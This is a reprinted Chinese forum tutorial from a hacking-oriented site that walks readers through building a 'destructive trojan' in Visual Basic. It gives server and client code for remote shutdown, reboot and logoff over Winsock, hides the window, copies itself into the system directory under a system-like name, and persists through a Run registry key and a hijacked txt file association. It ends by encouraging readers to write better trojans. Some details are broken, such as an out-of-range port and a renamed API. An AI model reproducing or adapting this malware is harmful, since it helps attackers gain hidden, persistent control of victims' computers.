主页 PC知识 网管技术 黑客帝国 安全技术 开放系统 程序设计 搜索 技术论坛

 

相关联接
 
RHU本级分类

编程语言
程序代码
WIN/*NIX编程
其他类别
JAVA专区

 
RHU阅读排行
·JDBC连接数据库经验集萃
·Hibernate3的DetachedCriteria支持
·初学者入门:Structs中基本配置入门
·Delphi架构师访谈:.NET、Kylix和Delphi
·经典:实例讲解如何穿越防火墙访问EJBs
·ANT初学入门之一:基本概念、安装与配置
·实现MFC扩展DLL中导出类和对话框
·Eclipse+Tomcat+Lomboz的安装配置说明
·Oracle中捕获问题SQL解决CPU过渡消耗
·浅议Oracle中的进制转换

 
 
RHU最新文章
·编程语言岁末盘点 C有望成为08年年度语言
·Google Web Toolkit(GWT) v1.5.3 - Google Web工具包
·定时重启或关机的小工具 HTA文件
·快速开发一个PHP扩展
·如何编写PHP扩展
·Vbs脚本实现radmin终极后门
·精选15个国外CSS框架
·抹掉所有进程中自己的句柄
·针对某驱动蓝屏分析笔记
·黑客编程小技巧(宏的使用)

 
 
RHU相关搜索









 
 
RHU广而告之

 
 
>您的位置:首页 -> 程序设计 -> 其他类别
利用Visual Basic编写破坏性木马

作者:RHU-TAC编辑员 来自:RHU网络采集 时间:2006-12-27 双击滚屏 收藏本页 字体:


点击 查看RHU2004全年文章


首先,新建一工程,名为Server,新建一个窗体,Name为Server,在窗体中加入一个winsock控件,Name设为sckServer,协议设为默认的TCP/IP协议。

接下来我们回来Server窗体模块中,添加如下代码:











Private Sub form_Load() 
  With Me 
   .sckServer.LocalPort = 88917'本地端口(呵呵!我的生日!) 
   .sckServer.Listen '开始监听 
  End With 
End Sub 

'接受客户端的连接请求。 

Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) 
  With Me 
   If .sckServer.State <>sckClosed Then .sckServer.Close 
   .sckServer.Accept (requestID) 
  End With 
End Sub

下面我们来建立客户端程序:新建一个工程,名为Client,把窗体名为Client,在上面加入一个winsock控件,名为sckClient,协议为TCP/IP协议。再加一个按钮cmdConnect在窗体模块中加入代码:

Private Sub form_Load() 
  With Me 
   .sckClient.RemoteHost = "127.0.0.1"'设置远程IP,本例设为本机。 
   .sckClient.RemotePort = 88917 '远程端口,就为server中的设置一样. 
  End With 
End Sub 

Private sub cmdConnect_Click() 
  SckClient.Connect 
End sub

至此,单击Connect按钮我们的两个工程已经可以进行通信了,但看不见,你可以在Client中的sckClient_Connect事件中加入代码:debug.print “Connetion successful!”来查看。

这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,本文章只实现一点小小的功能——关机,重启,注销。好,开始吧!

在Server工程中新建一个模块,Name为modApi,这个模快为一些API函数,添加如下API函数:

Public Declare Function ExitWindowXXX Lib "user32" Alias "ExitWindowXXX" (ByVal uFlags As
 Long, ByVal dwReserved As Long) As Long 

Public Const EWX_LOGOFF = 0 
Public Const EWX_REBOOT = 2 
Public Const EWX_SHUTDOWN = 1 
Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As 
Long 

Public Type RECT 
  Left As Long 
  Top As Long 
  Right As Long 
  Bottom As Long 
End Type

注:在两个socket中编程中,进行通信的重要事件是DataArrival事件,用于接收远程数据。

下面在Client工程的Client窗体中放入三个按钮,分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机,注销,重启操作。分别添加如下代码:

Private Sub cmdExit_Click() 
  Me.sckClient.SendData "Exit" 
End Sub 

Private Sub cmdLogoff_Click() 
  Me.sckClient.SendData "Logoff" 
End Sub 

Private Sub cmdReboot_Click() 
  Me.sckClient.SendData "Reboot" 
End Sub

全都是对服务端发出请求。下面转到Server工程中:在Server中添加sckServer的DataArrial事件,接收客户端的请求。

Private Sub sckServer_DataArrival(ByVal bytesTotal As Long) 
  Dim strData As String 
  With Me 
   ' 接收客户请求的信息 
   .sckServer.GetData strData 
   Select Case strData 
    Case "Exit" 
     '关机 
     Call ExitWindowXXX(EWX_SHUTDOWN, 0) 
    Case "Reboot" 
     '重启 
     Call ExitWindowXXX(EWX_REBOOT, 0) 
    Case "Logoff" 
     '注销 
    Call ExitWindowXXX(EWX_LOGOFF, 0) 
   End Select 
  End With 

End Sub

好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在Server中的form_Load事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧!

回到Server工程中的modApi中加入如下API函数:

Public Declare Function RegOpenKey Lib "advapi32.dll" 
Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As 
Long 

Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal 
hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, 
lpData As Any, ByVal cbData As Long) As Long 

Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey 
As Long, ByVal lpSubKey As String, phkResult As Long) As Long 
Public Const REG_BINARY = 3 

Public Const REG_SZ = 1 

Public Const HKEY_LOCAL_MACHINE = &H80000002 

Public Const HKEY_CLASSES_ROOT = &H80000000

写到注册表启动组中的过程。

Public Sub StartupGroup() 

  Dim sKey As String 
  Dim result As Long 
  Dim hKeyID As Long 
  Dim sKeyVal As String 

  sKey = "Systrsy" '启动组中的键,找一个与系统文件相近的。 
  sKeyVal = "C:/windows/system/systrsy.exe" '木马文件的路径,可以用GetSystemDirectory来取
得系统路径。 
  result = RegOpenKey(HKEY_LOCAL_MACHINE, _ 
    "Software/Microsoft/Windows/CurrentVersion/Run", hKeyID) 
  If result = 0 Then 
   result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, Len(sKey) + 1) 
  End If 
End Sub

好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:

Public Sub WriteToTxt() 

  Dim result As Long 
  Dim hKeyID As Long 
  Dim skey As String 
  Dim skeyVal As String 

  skey = "txtfile/shell/open/command" 
  skeyVal = "C:/windows/system/txtView.exe" 
  result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID) 

  If result = 0 Then 
   result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1) 
  End If 
End Sub

肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:/windows/system/

txtView.exe是哪里来的,我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。

好,回到Server工程的Server窗体的form_Load中,加入如下代码:

Dim sCurrentPath As String, sSystemDir As String 
sCurrentPath = App.Path & "/" & App.EXEName & ".exe" 
sSystemDir = “C:/windows/system” 
On Error Resume Next 

  '复制文件成系统目录下的Systrsy.exe 
  FileCopy sCurrentPath, sSystemDir & "/Systrsy.exe" 
On Error Resume Next 

复制文件成系统目录下的txtView.exe 

FileCopy sCurrentPath, sSystemDir & "/txtView.exe" 

   调用 

Call startupGroup 
Call WriteToTxt 

'判断程序是否下在运行 

If App.PrevInstance Then 
  '如果已经运行就退出。 
End 

End If

好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河。

注意:

1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突。

2、在第一次使用VB.NET的最好看看有关的图书,可能你能写出一款超级木马也说不定。



OVER

[1] 页 RedHyphone.Union 投稿邮箱
[特别声明]:
本站文章大多搜索转载自网络中,如果侵犯了您的权利,请告之我们。本站将立即删除。
本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
查看评论】【向上滚屏】【关闭窗口】【 打印
-相关文章
  • Linux系统病毒介绍 做好操作系统防护工程
  • SQL Server数据库查询速度慢原因及优化方法
  • 微软发布SQL Server 2005 SP3数据库正式版
  • 跳板攻击入侵技术实例解析
  • IE7 0DAY漏洞所用shellcode的分析
  • -文章评论 (关闭)
    ·还没有相关的评论!

    网上大名:
    红旋风网络技术联盟 RHUTech.Union
     
    Copyright © 2000-2007 RedHyphone.Union All Rights Reserved. 红旋风联盟版权所有.皖ICP备05011033号
    中国红旋风网络技术联盟 | www.RedHyphone.net
    Mailto:Redhyphone@gamil.com